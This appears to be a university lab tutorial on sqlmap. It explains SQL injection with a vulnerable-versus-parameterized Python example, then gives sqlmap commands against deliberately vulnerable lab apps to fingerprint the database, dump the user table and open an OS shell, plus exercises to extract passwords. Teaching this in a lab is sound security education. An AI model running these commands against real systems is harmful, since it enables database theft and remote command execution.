Note: if you just want to use the tool, take a look at the examples here and just use this reference for basic usage of the tool
Overview
SQLMAP is an open source penetration testing tool written in Python to detect and exploit SQL injection flaws.
It works for all modern databases, including MySQL, PostgreSQL, Oracle, Microsoft SQL Server, etc.
SQL Injection is an injection flaw where user input could alter the SQL query being constructed and executed by the application.
SQLMAP automates the common SQL injection techniques; details about the different techniques it automates can be found here: sqlInjectionTechniques.html
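The definition above (user input altering the query the application builds) is easiest to see next to its fix. The following is an added example, not code from this page or from sqlmap: an in-memory SQLite table standing in for a login table, a login function that builds its query by string concatenation, and the same function written with bind parameters. The table name, column names and the sample rows are assumptions; the tamper value is a constructed one of the kind sqlmap's probes are built from.

```python
import sqlite3


def make_db():
    # Constructed sample data; the schema is an assumption, not the real
    # fourFours application's table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fourfoursuser (username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO fourfoursuser VALUES (?, ?)",
        [("Alex", "correct-horse"), ("Sam", "battery-staple")],
    )
    return conn


def login_vulnerable(conn, user, password):
    """Builds the query by string concatenation: the user input becomes part
    of the SQL text, so a crafted value can change the query's logic."""
    query = (
        "SELECT username FROM fourfoursuser WHERE username = '"
        + user + "' AND password = '" + password + "'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, user, password):
    """Passes the values as bind parameters: the driver hands them to the
    database as data, so they are never interpreted as SQL syntax."""
    query = "SELECT username FROM fourfoursuser WHERE username = ? AND password = ?"
    row = conn.execute(query, (user, password)).fetchone()
    return row[0] if row else None


def demo():
    """Runs both versions against a valid password and a tampered one."""
    conn = make_db()
    probe = "' OR '1'='1"  # constructed tamper value; turns the WHERE clause into a tautology
    return {
        "vulnerable_valid": login_vulnerable(conn, "Alex", "correct-horse"),
        "vulnerable_tampered": login_vulnerable(conn, "Alex", probe),
        "parameterized_valid": login_parameterized(conn, "Alex", "correct-horse"),
        "parameterized_tampered": login_parameterized(conn, "Alex", probe),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

In the concatenated version the tampered password makes the WHERE clause read `username = 'Alex' AND password = '' OR '1'='1'`, which is true for every row, so the login "succeeds" without a password; the parameterized version compares the literal string and returns no row. Every command in the tutorial below is sqlmap finding and exploiting exactly this difference, so the check a defender wants is that no query in the application is built the first way.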
Use Cases
For attacker
Attackers can use the tool to get into a database, and potentially the server!
Sqlmap is capable of providing a SQL shell into the database, allowing an attacker to potentially execute any arbitrary SQL command.
Moreover, sqlmap also has an option to provide the attacker with an OS shell, from which the attacker can execute arbitrary OS commands! (SQL injection leading to command injection!)
Sqlmap will also try to crack user passwords when it finds hashes, using dictionary attacks, so attackers can even use this tool to get your passwords!
For defender
Defenders can use sqlmap for penetration testing of their web applications, servers, and databases.
Use the tool to crack weak passwords, assess whether the database is run with restrictive privileges, and detect any potential injection holes in the application.
Options
Sqlmap is a command line tool, and just like any other Unix utility, one can find all the options they need to know by simply invoking the -h flag, i.e. sqlmap -h, which will display all the options the tool accepts.
Essentially, to use sqlmap, all you need to know is the url of the target web application along with the parameters to target for injection. Here are the most common options to remember for using sqlmap:
To fingerprint a database: sqlmap -u "URL?name=value" --data="name=&name=value" --cookie="name=value" -f
All the demonstrations are within a custom VM accessible to all students on the dh2020pc00 machine.
Grab a copy of CustomUbuntu804Server.zip from the /virtual/injection/ directory on the dh2020pc00 machine.
Ex:
scp $USER@dh2020pc00.utm.utoronto.ca:/virtual/injection/CustomUbuntu804Server.zip /virtual/$USER
cd /virtual/$USER
unzip CustomUbuntu804Server.zip
Run VMplayer, open the VM you just unzipped, and use NAT (VMnet8) for the Network Adapter setting.
Login with username root and password password
Note down the IP address shown (/sbin/ifconfig will show you the IP address if you missed it).
For the subsequent steps, we will refer to the IP address that showed up for you as $ipaddress.
Tutorial
Sqlmap has been installed on the custom VM that you just set up.
From a terminal, sqlmap -h will show the options of sqlmap.
The following tutorial uses the deliberately vulnerable fourFours application, accessible in the browser at $ipaddress/fourFours
Fingerprint the database and server hosting fourFours using sqlmap:
sqlmap -u 127.0.0.1/fourFours/index.php --data="user=&password=&operation=login"
Get all tables of public database:
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --tables -D public
Get all columns and data of the fourfoursuser table from the public database:
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --columns -D public -T fourfoursuser
Prompt to get an OS shell!
sqlmap -u 127.0.0.1/fourFours/index.php --data "operation=login&user=Alex&password=" --os-shell
Exercises
Damn Vulnerable Web App, a common web application used to teach / learn about injection flaws, has also been installed on the VM. The web app can be accessed at $ipaddress/dvwa and the login is admin / password.
Log in to Damn Vulnerable Web Application, go to $ipaddress/dvwa/vulnerabilities/sqli for the sample SQL injection application, and use sqlmap to solve the following tasks:
Discover the type of database used by the application
Determine the current user, hostname, whether or not the current user is an admin, and the current database
Get user, passwords, roles and privileges from the database
Enumerate all the tables in the database, then get all the columns as well